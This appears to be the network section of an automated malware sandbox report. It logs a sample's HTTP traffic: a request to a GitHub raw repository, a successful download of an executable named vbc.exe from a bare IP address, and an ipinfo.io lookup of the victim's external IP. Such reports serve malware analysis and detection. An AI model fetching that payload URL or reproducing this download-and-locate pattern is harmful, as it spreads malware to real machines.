Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
raw.githubusercontent.com | 185.199.108.133 | |
ipinfo.io | 34.117.59.81 |
GET
404
https://raw.githubusercontent.com/GodOfWareFare/TheGoodKidPhotos/main/rt.jpg
REQUEST
RESPONSE
BODY
GET /GodOfWareFare/TheGoodKidPhotos/main/rt.jpg HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 14
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Content-Type: text/plain; charset=utf-8
X-GitHub-Request-Id: 678C:02F7:16C6:3C3D:63D1E042
Accept-Ranges: bytes
Date: Thu, 26 Jan 2023 02:06:58 GMT
Via: 1.1 varnish
X-Served-By: cache-icn1450060-ICN
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1674698819.669635,VS0,VE236
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
X-Fastly-Request-ID: 9c7b917deede512da2abc15b65f5e965fbd06666
Expires: Thu, 26 Jan 2023 02:11:58 GMT
Source-Age: 0
GET
200
http://104.223.76.152/126/vbc.exe
REQUEST
RESPONSE
BODY
GET /126/vbc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 104.223.76.152
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 26 Jan 2023 02:05:25 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.0.25
Last-Modified: Tue, 24 Jan 2023 00:50:48 GMT
ETag: "e4400-5f2f7e81474ea"
Accept-Ranges: bytes
Content-Length: 934912
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET
200
http://ipinfo.io/ip
REQUEST
RESPONSE
BODY
GET /ip HTTP/1.1
Host: ipinfo.io
Connection: Keep-Alive
HTTP/1.1 200 OK
access-control-allow-origin: *
content-type: text/html; charset=utf-8
content-length: 15
date: Thu, 26 Jan 2023 02:06:59 GMT
x-envoy-upstream-service-time: 1
strict-transport-security: max-age=2592000; includeSubDomains
Via: 1.1 google
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49168 185.199.108.133:443 |
C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1 | C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io | 8f:0e:79:24:71:c5:a7:d2:a7:46:76:30:c1:3c:b7:2a:13:b0:01:b2 |
Snort Alerts
No Snort Alerts